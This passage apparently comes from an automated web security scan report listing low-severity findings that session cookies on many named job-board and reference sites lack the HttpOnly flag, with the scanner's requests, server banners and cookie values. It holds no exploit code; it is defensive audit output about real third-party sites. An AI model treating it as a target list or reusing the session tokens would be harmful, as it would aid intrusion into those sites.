flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.7. http://www.aerospacecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aerospacecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.8. http://www.agriculturalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.agriculturalcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.9. http://www.aharrisonbarnes.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=4quu0rekl19krf2nje0ll9eoh4; path=/
wpgb_visit_last_php-default=1295648507; expires=Sat, 21-Jan-2012 22:21:47 GMT; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=4quu0rekl19krf2nje0ll9eoh4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648507; expires=Sat, 21-Jan-2012 22:21:47 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91358

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
var error = "";
if (strng == "")

...[SNIP]...

10.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/contact-us/script/functions.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=a0f1qvin1rmg1u6sbvil1pk2c0; path=/
wpgb_visit_last_php-default=1295655427; expires=Sun, 22-Jan-2012 00:17:07 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/script/functions.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

10.11. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=td5el2h9micq2p5p4knldobtl7; path=/
wpgb_visit_last_php-default=1295648498; expires=Sat, 21-Jan-2012 22:21:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.12. http://www.aharrisonbarnes.com/hb-course/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/hb-course/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=8o9prlskfceq1un5hq35vcpgi6; path=/
wpgb_visit_last_php-default=1295648510; expires=Sat, 21-Jan-2012 22:21:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hb-course/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/push-yourself-outside-your-comfort-zone/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=5o76npmpltlll2h6khib1qgu27; path=/
wpgb_visit_last_php-default=1295648499; expires=Sat, 21-Jan-2012 22:21:39 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /push-yourself-outside-your-comfort-zone/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=dtob70g4f8pltdn39q5stffbl1; path=/
wpgb_visit_last_php-default=1295655263; expires=Sun, 22-Jan-2012 00:14:23 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

10.15. http://www.answers.com/topic/vinson-elkins-llp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.answers.com
Path:	/topic/vinson-elkins-llp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
firstPageTypeSession=topic-page; Path=/
lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.16. http://www.architecturecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.architecturecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.17. http://www.attorneyresume.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.attorneyresume.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=3oi3tsj2agglmdtggh0p0r2jo5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.18. http://www.auditorcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.auditorcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.19. http://www.automotivecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.automotivecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.20. http://www.aviationcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.aviationcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.21. http://www.bcgsearch.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bcgsearch.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=f0h1k6bqv29tdb1vvdit6ua003; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=f0h1k6bqv29tdb1vvdit6ua003; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31541

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<TITLE>Attorney Jobs, Law Jobs, Legal Jobs, Legal Recruiter, Legal Search Firm
...[SNIP]...

10.22. http://www.bcgsearch.com/browsejobs.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bcgsearch.com
Path:	/browsejobs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2apfl02pmtrjbdcsqqnff0fmc3; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browsejobs.php HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 21 Jan 2011 19:34:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=2apfl02pmtrjbdcsqqnff0fmc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
location: browsejob/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

10.23. http://www.bcgsearch.com/searchresults.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bcgsearch.com
Path:	/searchresults.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e0kuekof5a3ckuktgjpsc8gnp2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searchresults.php HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.24. http://www.bilingualcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bilingualcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.25. http://www.biotechcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.biotechcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.26. http://www.bluecollarcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bluecollarcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.27. http://www.businessanalystcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.businessanalystcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.28. http://www.businessdevelopmentcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
